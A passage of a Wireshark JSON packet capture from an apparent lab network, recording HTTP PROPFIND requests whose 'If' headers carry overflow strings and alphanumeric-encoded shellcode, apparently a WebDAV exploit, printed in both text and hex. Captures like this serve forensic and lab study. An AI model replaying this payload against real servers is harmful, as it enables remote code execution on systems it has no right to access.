jbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "442"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.852254000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.852254000",
|
||
"frame.time_delta": "0.000008000",
|
||
"frame.time_delta_displayed": "0.004045000",
|
||
"frame.time_relative": "17.103194000",
|
||
"frame.number": "450",
|
||
"frame.len": "287",
|
||
"frame.cap_len": "287",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "273",
|
||
"ip.id": "0x000084f1",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000ab8e",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "41937",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "41937",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "67",
|
||
"tcp.len": "221",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3519050947",
|
||
"tcp.nxtseq": "1670",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1268573197",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00004b74",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:74:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:74:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868660",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000379000",
|
||
"tcp.analysis.bytes_in_flight": "1669",
|
||
"tcp.analysis.push_bytes_sent": "1669"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000737000",
|
||
"tcp.time_delta": "0.000008000"
|
||
},
|
||
"tcp.payload": "49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "449",
|
||
"tcp.segment": "450",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1669",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:78:64:56:4c:4a:4e:6d:63:75:6f:61:58:6a:4a:45:75:50:6b:70:47:70:4c:55:4a:46:46:62:6c:41:67:4c:69:74:5a:4a:5a:50:6a:71:4c:6c:41:6d:57:45:41:41:64:52:79:48:44:47:70:79:75:4d:78:6d:63:59:58:49:4c:48:59:45:75:4d:4e:79:59:6c:69:50:4b:6f:6b:6b:e7:8d:b8:e6:91:ae:e7:8d:88:e4:b9:ad:e7:a1:8c:e4:ad:8c:e7:95:ad:e7:95:93:e5:9d:b1:e6:85:99:e6:89:86:e7:a9:a8:e6:89:8b:e4:8d:b0:e7:81:b6:e6:85:b0:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:ad:82:e4:95:89:e6:91:a6:e5:99:b9:e4:b5:b5:e6:ad:93:e6:b1:af:e6:a1:b6:e6:ad:a2:e4:a1:ba:e5:a5:a3:e6:9d:81:e7:a1:8f:e6:95:b5:e5:95:87:e7:91:a7:e4:b9:a9:e5:a5:9a:e7:9d:98:e4:99:82:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:68:6a:67:42:41:5a:50:68:79:68:6f:44:45:61:6c:68:51:74:6e:53:49:69:66:49:6a:6a:65:4f:52:4d:47:43:58:59:7a:52:61:65:77:6e:5a:78:46:41:42:6e:41:42:68:49:66:61:4b:74:67:6f:4f:71:62:76:55:57:6e:46:78:41:6a:4a:74:49:7a:58:4e:73:61:75:6a:4f:44:e6:8d:ad:e5:85:9a:e5:8d:83:e7:89:ac:e5:a9:ac:e5:81:b3:e6:89:81:e4:a1:8e:e4:b1:99:e5:81:ab:e4:a5:8e:e4:a9:a8:e4:a5:b2:e5:a1:87:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:b9:97:e7:9d:88:e6:9d:ad:e5:81:81:e1:8f:80:e6:a0:83:e6:89:b8:e5:a1:ac:e7:95:a6:e4:ad:ad:e7:85:a5:e6:95:86:e6:8d:8d:e4:b1:98:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/xdVLJNmcuoaXjJEuPkpGpLUJFFblAgLitZJZPjqLlAmWEAAdRyHDGpyuMxmcYXILHYEuMNyYliPKokk<6B><6B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/hjgBAZPhyhoDEalhQtnSIifIjjeORMGCXYzRaewnZxFABnABhIfaKtgoOqbvUWnFxAjJtIzXNsaujOD<4F><44><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "452"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.856016000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.856016000",
|
||
"frame.time_delta": "0.000007000",
|
||
"frame.time_delta_displayed": "0.003762000",
|
||
"frame.time_relative": "17.106956000",
|
||
"frame.number": "460",
|
||
"frame.len": "285",
|
||
"frame.cap_len": "285",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "271",
|
||
"ip.id": "0x0000c498",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00006be9",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "44311",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "44311",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "68",
|
||
"tcp.len": "219",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "4205038832",
|
||
"tcp.nxtseq": "1668",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1511389447",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000e718",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:77:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:77:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
